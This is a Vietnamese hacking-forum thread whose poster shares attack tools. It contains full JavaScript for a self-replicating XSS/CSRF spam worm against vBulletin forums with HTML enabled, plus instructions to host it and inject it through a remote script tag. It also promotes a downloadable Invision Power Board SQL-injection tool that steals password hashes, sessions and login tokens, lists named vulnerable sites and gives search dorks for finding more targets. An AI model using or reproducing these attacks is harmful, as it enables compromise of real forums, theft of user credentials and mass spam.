| |
|
|
bkvirus wrote:
Icttrack wrote:
Sau khi lưu nó xong thì hãy tải lên máy chủ lưu trữ web (web server) của các bạn rồi đánh câu sau vào nội dung bài viết của mình "<script src='http://diachiwebserver/r.js'></script> với r.js là file bạn vừa lưu. Nội dung thì tùy bạn vì đến khi bài viết hiện ra cho người khác xem, thì sẽ không có đoạn mã trên nữa. Và cứ từ đó trở đi, nếu ai vào đọc bài của bạn thì họ sẽ phát tán spam trên diễn đàn đó.
Bài viết do thành viên gởi lên sao có thể chèn tag sử dụng file *.js được ?
Hay là mã HTML ở box đó được open thì ta sẽ lợi dụng nó ?
Lâu lắm rồi không vào diễn đàn. Đúng như lời bạn nói đó
|
 |
|
|
|
chế độ mặc định của vbb là xác thực bằng hình ảnh (captcha) thì chả có spam bot nào ở đây cả, là người hoàn toàn đó bạn
|
|
|
|
ac4him2ntu wrote:
Mình đang học hỏi lập 1 diễn đàn bằng vbb.
Diễn đàn của của mình cho phép mem sử dụng HTLM trong bài viết.
Như vậy có nguy hiểm cho diễn đàn không ?
Người ta có thể lợi dụng, phá hoại những gì, như thế nào với chức năng ấy ?
Mình đang băn khoăn vấn đề này. Mọi người giải đáp giúp với nha
Thanks
Nếu làm vậy bạn có thể bị dính XSS, mình có làm đoạn mã để tấn công diễn đàn vbb, bạn có thể xem tại đây
/hvaonline/posts/list/27631.html#168988
|
|
|
|
VBB không bị lỗi gì trong việc này. Lỗi là do người quản trị của diễn đàn sử dụng vbb.
Đoạn mã này sử dụng thủ thuật XSS nhưng cách thức tiến hành (thay quyền người sử dụng) thì lại theo kiểu XSRF
Cụ thể hơn với các diễn đàn sử dụng vbb phiên bản 3.7.x (mình mới chỉ kiểm nghiệm 3.7.4 và 3.7.3) nếu người quản trị bật mã HTML cho một mục nào đó thì bạn hoàn toàn có thể dùng đoạn mã bên dưới.
Do vbb tương đối công khai tình trạng các mục (box) trên diễn đàn về mã IMG, bbcode nên việc tìm kiếm các diễn đàn bị sơ xuất trong quản trị là rất đơn giản với google. Bạn chỉ cần gõ trên google với câu lệnh "mã HTML đang mở" thì có khá nhiều trang web VN nằm trong kết quả.
Đoạn mã hoàn toàn có khả năng tự nhân bản nếu bài viết nội dung lại trỏ tới chính đoạn mã bẩn
Đây là đoạn mã mình viết để nghịch chơi với các diễn đàn sử dụng vbulletin, nay chia sẻ cho các bạn
Đoạn mã này đã được mình dùng trong bài viêt về http://th6b.net/ban-luan-chung/909-xss-thay-mat-nguoi-su-dung-tiep-phan-i.th6b. Khi bạn gửi bài viết của mình vào diễn đàn không được bảo mật cẩn thận, thì bất kì ai xem đoạn mã này sẽ trở thành nạn nhân phát tán spam.
Đây là thời điểm đoạn mã mình có hiệu lực với diễn đàn http://digifuns.com/forum/index.php. Tất nhiên nay thì đã bị xoa rồi.
Thông tin chi tiết có thể xem tại đây vì đã có bạn dùng thành công
http://th6b.net/cac-phuong-phap-hay/1122-ma-spam-tu-dong-dung-de-tan-cong-dien-dan.th6b
Dưới đây là mã nguồn
Code:
var targeturl=''//dien dia chi dien dan;
var messagebody=''//dien noi dung bai gui, chu y phai thoat cac ki tu dac biet
var forumindex='2,5,6,7'//dien chi muc cua dien dan ban muon tan cong
function xmlobj() {
try {
var http_request=new XMLHttpRequest();
} catch(e) {
try {
var http_request=new ActiveXObject("Microsoft.XMLHTTP")
} catch(e) {
var http_request=null;
}
}
return http_request;
}
function rand(min,max) {
var len=Math.abs(max-min);
return max-Math.floor(Math.random()*(len+1));
}
function mal() {
var rf=forumindex.split(",");
var rd=rand(0,rf.length-1);
if(targeturl.length==0)
var target='newthread.php?do=newthread&f='+rf[rd]
else if(targeturl.length>0)
var target=targeturl+'newthread.php?do=newthread&f='+rf[rd];
else
return false;
GET(target);
function GET(url) {
var xml_instance=xmlobj()
if(!xml_instance)
return null;
var data;
xml_instance.open("GET",url,true);
xml_instance.onreadystatechange=fetchvalue;
xml_instance.send(null);
function fetchvalue() {
if(xml_instance.readyState==4 && xml_instance.status==200) {
data=xml_instance.responseText
var st,end,tok,posthash,time,subject='',message='';
st=data.indexOf("var SECURITYTOKEN = ")+21;
end=data.indexOf("\";",st);
tok=data.substring(st,end);
st=data.indexOf("\"posthash\" value=\"")+18
end=data.indexOf("\"",st)
posthash=data.substring(st,end);
st=data.indexOf("\"poststarttime\" value=\"")+23;
end=data.indexOf("\"",st)
time=data.substring(st,end)
for(i=0;i<=8;i++)
subject+=String.fromCharCode(rand(65,90))
if(messagebody.length>0)
message=messagebody;
else {
for(i=0;i<=300;i++)
message+=String.fromCharCode(rand(40,122))
}
POST(target,"f="+rf[rd]+"&do=postthread&loggedinuser=1&securitytoken="+tok+"&posthash="+posthash+"&poststarttime="+time+"&subject="+subject+"&message="+message)
}
}
}
function POST(url,param) {
var xml_instance=xmlobj()
if(!xml_instance)
return null
xml_instance.open("POST",url,true)
xml_instance.setRequestHeader("Content-Type","application/x-www-form-urlencoded")
xml_instance.onreadystatechange=nothing;
xml_instance.send(param);
function nothing() {}
}
}
setInterval("mal()",1000);
Bạn hãy copy đoạn mã trên vào một trình soạn thảo, lưu dưới dạng một file bất kì có đuôi là .js. Sau đó tinh chỉnh nó đi dựa theo chú thích ở trên đầu. Địa chỉ diễn đàn có lẽ không phải điền, vì quá trình truy cập diễn đàn theo đường link tương đối (relative url), thứ bạn cần chỉnh là chỉ mục của diễn đàn cần tấn công và nội dung bài spam, nếu để trống thì kí tự sẽ ngẫu nhiên.
Sau khi lưu nó xong thì hãy tải lên máy chủ lưu trữ web (web server) của các bạn rồi đánh câu sau vào nội dung bài viết của mình "<script src='http://diachiwebserver/r.js'></script> với r.js là file bạn vừa lưu. Nội dung thì tùy bạn vì đến khi bài viết hiện ra cho người khác xem, thì sẽ không có đoạn mã trên nữa. Và cứ từ đó trở đi, nếu ai vào đọc bài của bạn thì họ sẽ phát tán spam trên diễn đàn đó.
|
|
|
|
Mr.Win wrote:
Một đống Virus bên trong mà bảo là chương trình tự viết à ? Xem lại bản thân đi nhá và đừng bao giờ đánh giá member trong Forum này quá gà. Thân! 
Bạn chưa từng gặp chương trình diệt virus phát hiện nhầm à
Khi mình viết chương trình này thì chương trình diệt virus của mình không phát hiện ra
Mình tự viết nó thật đấy, nếu như có chương trình nào thông báo virus thì xin thề với bạn rằng nó đã phát hiện nhầm, chương trình này nhiều khả năng đã dùng các mã, các hàm mà các AV (antivirus) cho rằng nó có mục đích xấu với người sử dụng nó nhưng thực tế lại không phải. Nếu cần thiết, mình sẽ cho bạn xem mã nguồn.
Điều này đã xảy ra với diễn đàn lớp mình, có một thằng bạn đưa mã thay đổi màu nền vào, nhưng để cho không ai copy được nó, thằng bạn của mình đã dấu nó bằng một đoạn mã javascript có chức năng mã hóa thông tin để khiến cho những ai amateur không thể copy trộm hiệu ứng. Điều này khiến cho AV của mình tưởng diễn đàn mình sử dụng mã độc, nên đã ngăn không cho mình vào. Sau khi hỏi thằng bạn mình (nó bảo đó không phải là mã độc), mình đi dò xem có mã nghi ngời nào không, quả nhiên là có. Và sau một hồi phân tích, đoạn mã đó trỏ đến đoạn mã hiệu ứng trên diễn đàn mình.Mình quyết định để lộ đoạn mã hiệu ứng và xóa đoạn mã cũ đi. Vậy là chương trình AV của mình không cảnh bảo nữa. Hiện tại mình không có đoạn mã đó ở đây, nhưng nhìn chung đoạn mã này 'na ná' giống với thủ thuật hacker hay dùng để qua được việc lọc XSS hay dùng để giấu mã nguồn như mình vừa nêu. Đoạn mã được viết bằng javascript. Mình tương đối thành thạo javascript và PHP. Hiệu ứng ở diễn đàn lớp mình do mình viết.
Diễn đàn lớp mình ở http://th6b.net. Nickname của mình trùng với nickname ở diễn đàn này
|
|
|
|
Không biết đã ai thành công với công cụ này chưa nhỉ
Mình đã dùng nó để đột nhập vào diễn đàn www.fotech.org mà không cần biết mật khẩu của admin. Kết quả là mình có toàn quyền của admin đó. Xem hình dưới
|
|
|
|
Mình muốn cảm ơn tác giả bài viết http://acid-root.new.fr/?0:18 vì đã đưa ra những ý tưởng để mình thực hiện chương trình này (mất mấy ngày để hiểu tác giả đó nói gì)
Đây là chương trình hack đầu tiên của mình, mục tiêu nó nhắm đến là các diễn đàn sử dụng phần mềm invision power board, phiên bản 2.3.x, chưa được vá. Chức năng chính của nó là lấy mật khẩu đã được mã hóa của các thành viên trong diễn đàn, thử phá nó bằng cách liệt kê tất cả các trường hợp có thể của mật khẩu.
Lỗi của IP board: phần mềm này áp dụng chính sách an ninh nhiều lớp để bảo vệ diễn đàn trước các kí tự đặc biệt sẽ đem vào trong câu truy vấn trong máy chủ sql. Tuy nhiên do quá cẩn thận mà lại phản tác dụng, vì vậy tạo điều kiện cho kẻ xấu có thể lấy được dữ liệu thông qua lỗi SQL injection.
Danh sách một số trang bị lỗi trên tại thời điểm viết bài:
http://www.mirmasters.com/ib/index.php
http://forums.parachat.com/index.php
http://www.milankakabaros.com/index.php
http://gamemusichall.net/forum/index.php
http://www.diendandulich.net/dulich/diendan/index.php
Nếu muốn tìm thêm có thể dùng từ khóa sau trong google:powered by (IP board 2.3.~|invision)
Trước tiên bạn hãy tải công cụ về tại đây(không có virus đâu): http://www.mediafire.com/?hdy2lnw3gyl
Đánh giá: nhìn chung chương trình sẻ khả thi với các mật khẩu có độ dài nhỏ hơn hoặc bằng 6 kí tự, nếu quá ngưỡng này thì phải tuy thuộc vào sự may mắn và kiên nhẫn của các bạn, như mình thì đã phá được mật khẩu của một thành viên trong diễn đàn vnnonline.org vì tay này đặt mật khẩu toàn là số.
chạy nó từ giao diện dòng lệnh của windows xp, bạn sẽ thấy như hình dưới
tìm trong google các diễn đàn sử dụng ip board phiên bản 2.3.x, copy đường dẫn của chúng, dán vào trong cửa sổ dòng lệnh bằng việc bấm chuột phải chọn paste
nếu trang web bạn đánh vào hợp lệ (đầy đủ cả http:// ở đầu và bao gồm cả tên file index.php) và trang web đó có lỗi, bạn sẽ nhận được thông báo sau
Bạn sẽ có 4 lựa chọn tất cả
1. Cướp mật khẩu mã hóa và "muối".
2. Dò mật khẩu dựa trên thông tin đã cướp được (thông qua chuỗi mã hóa và "muối").
3. Lấy id của người sử dụng (dùng để chạy ở 1)
4. Lấy phiên làm việc của người sử dụng
5. Lấy bản ghi nhớ của người sử dụng
Các mục 2,3,4,5 mình sẽ đề cập sau
Sau khi chọn mục 1, bạn được yêu cầu nhập id của người sử dụng, nếu muốn cướp mật khẩu mã hóa của người quản trị diễn đàn thì hãy chọn id là 1, hoặc 2,3 (nếu diễn đàn có nhiều người quản trị)
Sau đó bạn được yêu cầu nhập tiền tố của bảng trong cơ sở dữ liệu, nhấn enter để bỏ qua
Chương trình sẽ dò chuỗi mã hóa của mật khẩu và muối, nếu quá trình dò thành công, bạn sẽ được như hình
Đây là giai đoạn quan trọng, thuật toán md5 dùng để mã hóa thông tin hiện nay chưa có cách phá, vì vậy để tìm được mật khẩu, cần phải liệt kê toàn bộ các khả năng có thể cho một mật khẩu rồi so sánh các kết quả sau khi đã được mã hóa với chuỗi mã hóa vừa tìm được.Nếu thành công thì đó sẽ là mật khẩu ta cần tìm.Vấn đề là mật khẩu của đối tượng sẽ gồm bao nhiêu kí tự gồm chữ hay số hoặc là cả 2, hoặc thậm chí là gồm cả các kí tự đặc biệt"!;@;#;$;%;..".Để cho đơn giản chương trinh chỉ tìm các mật khẩu gồm chữ và số hoặc là cả 2
Các tham số:
-v [x]: tìm kiếm mật khẩu có độ dài tối đa là x với x là số
-f [x]:tìm kiếm mật khẩu có độ dài cố định là x
-a: Mật khẩu chỉ bao gồm chữ cái
-d:Mật khẩu chỉ bao gồm chữ số
-w:Mật khẩu bao gồm cả chữ và số
-e [charlist]: Loại bỏ các kí tự có trong charlist
Ví dụ khi mình gõ -v 4 -a -e acdg thì chương trinh sẽ tim các mật khẩu có độ dài tối đa là 4 kí tự,mật khẩu chỉ bao gồm chữ cái,và loại bỏ các kí tự a,c,d,g. Còn nếu mình gõ -f 5 -w -e jklmn thì chương trinh sẽ tim các mật khẩu có độ dài cố định là 5 kí tự, bao gồm cả chữ và số, loại bỏ các kí tự j,k,l,m,n trong danh sách liệt kê các mật khẩu.
Đây là ảnh chụp khi mình dò tìm mật khẩu với độ dài 4 kí tự
Thông thường với các mật khẩu có độ dài nhỏ 4 hoặc 5, chương trình có thể tìm ra mật khẩu trong thời gian rất nhanh, nhưng nếu mật khẩu tăng độ dài lên một kí tự, thời gian máy tính liệt kê tất cả các khả năng có thể sẽ rất lâu, nếu coi máy tính xử lý được 10000 kết quả mỗi giây thì với mật khẩu có độ dài là 8 kí tự, tức là sẽ có 26^8 khả năng (kiến thức toán rời rạc), thì sẽ phải mất 26^8 : 10000 : 86400 = 241 ngày liệt kê của máy tính. Đây là theo tính toán lý thuyết, còn thực tế còn phục thuộc vào thuật toán, tốc độ bộ vi xử lý.... Tuy nhiên với mật khẩu có 4 kí tự, chỉ mất có hơn 45s (với máy mình thì mất hơn gần 3 phút để liệt kê tất cả).
Nói chung là không khả thi, tuy nhiên các bạn có thể giảm thiểu thời gian bằng cách đoán biết mật khẩu của đối tượng chỉ chứa những kí tự nào, chẳng hạn với người việt chúng ta thì mật khẩu có chữ w, z, j sẽ ít được dùng, do đó có thể loại bỏ ra khỏi chương trình tìm kiếm.
Tuy vậy ta vẫn có các lựa chọn khác
Các lựa chọn khác:
2. Phá mật khẩu dựa trên thông tin mã hóa tìm được.
Nếu đã tìm được mật khẩu mã hóa ở 1, thì hãy lưu cả đoạn mã hóa đó vào một file nào đó, sau đó nếu tìm kiếm có thất bại thì cũng không phải chạy lại 1 mà chạy luôn 2 để thử lại
3. Tìm id
Cái này để dùng cho 1, bạn nhập tên người sử dụng vào, nhập id lớn nhất có thể có dành cho người này, chương trình sẽ tìm ra id chính xác
4. Lấy phiên làm việc của người sử dụng
Nếu có phiên làm việc của người sử dụng, bạn có thể vào được trong diễn đàn với tên của người sử dụng đó mà không cần mật khẩu, tuy nhiên điều này chỉ thực hiện được nếu quản trị diễn đàn đó tắt chính sách bảo mật là kiểm tra địa chỉ IP
5. Lấy chuỗi ghi nhớ
Chuỗi ghi nhớ được tạo ra trong các diễn đàn nhằm mục đích tạo sự thuận tiện trong việc đăng nhập. Bạn đăng nhập một lần, lần sau bạn vào lại mà không phải đăng nhập
Nếu lấy được nó, bạn có thể vào được diễn đàn dưới cái tên của đối tượng
Tuy nhiên nó chỉ khả thi nếu diễn đàn tắt chế độ kiểm tra stronghold
|
|
|
|
|
|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
